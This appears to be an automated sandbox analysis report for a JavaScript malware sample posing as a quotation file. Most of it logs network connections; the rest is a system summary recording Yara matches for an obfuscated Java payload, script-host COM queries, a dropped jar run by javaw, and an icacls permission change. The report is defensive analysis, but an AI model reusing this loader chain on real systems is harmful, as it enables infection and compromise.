        Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
        Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
        Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49706 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49707 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49704 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49708 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49709 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49710 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49711 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49712 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49713 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49714 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49715 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49723 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49725 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49726 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49727 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49728 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49729 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49730 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49731 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49732 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49733 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49734 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49737 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49736 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49735 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49741 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49740 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49739 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49742 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49743 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49744 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49745 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49746 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49747 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49748 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49749 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49750 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49752 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49753 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49755 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49756 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49757 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49758 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49759 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49760 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49761 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49762 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49763 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49764 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49765 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49767 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49768 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49769 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49770 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49771 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49772 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49773 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49774 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49775 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49776 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49777 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49778 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49779 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49780 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49781 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.196.209:443 -> 192.168.2.5:49782 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49783 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49784 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49785 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49786 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49787 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49788 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49789 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49790 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49791 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49792 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49793 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49794 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49795 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49796 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49797 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49798 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49799 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49800 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49801 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 199.232.192.209:443 -> 192.168.2.5:49802 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:49803 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Source: 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Source: Process Memory Space: javaw.exe PID: 6556, type: MEMORYSTRMatched rule: Detects files packed with Allatori Java Obfuscator Author: ditekSHen
        Windows Scripting host queries suspicious COM object (likely to drop second stage)
        Source: C:\Windows\System32\wscript.exeCOM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: Quotation#4873920.jsInitial sample: Strings found which are bigger than 50
        Source: 00000002.00000002.3369356460.0000000009B63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: 00000002.00000002.3369356460.0000000009B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: Process Memory Space: javaw.exe PID: 6556, type: MEMORYSTRMatched rule: INDICATOR_JAVA_Packed_Allatori author = ditekSHen, description = Detects files packed with Allatori Java Obfuscator
        Source: classification engineClassification label: mal100.troj.evad.winJS@6/4@8/4
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\rybdyjbhxf.txtJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeFile created: C:\Users\user\AppData\Local\Temp\hsperfdata_userJump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: Quotation#4873920.jsReversingLabs: Detection: 24%
        Source: Quotation#4873920.jsVirustotal: Detection: 37%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Quotation#4873920.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rybdyjbhxf.txt"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\rybdyjbhxf.txt"Jump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeSection loaded: dhcpcsvc6.dllJump to behavior
